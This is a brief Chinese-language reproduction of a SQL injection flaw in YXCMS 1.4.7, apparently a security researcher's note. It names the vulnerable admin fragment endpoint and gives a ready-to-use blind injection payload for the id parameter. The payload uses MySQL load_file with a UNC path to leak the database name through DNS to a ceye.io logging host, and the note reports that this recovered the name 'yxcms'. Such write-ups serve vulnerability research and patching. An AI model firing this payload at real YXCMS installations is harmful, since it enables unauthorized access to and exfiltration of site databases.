YXCMS 1.4.7SQL注入

1. 影响版本¶

1.4.7

2.漏洞复现¶

url:/index.php?r=admin/fragment/index 利用ceye得到的回显 用bp抓包，修改id为

payload:

2 and if((select load_file(concat('\\',(select database()),'.36rdia.ceye.io\abc'))),2,2)

在ceye上面可以得到回显：

得到了数据库名称yxcms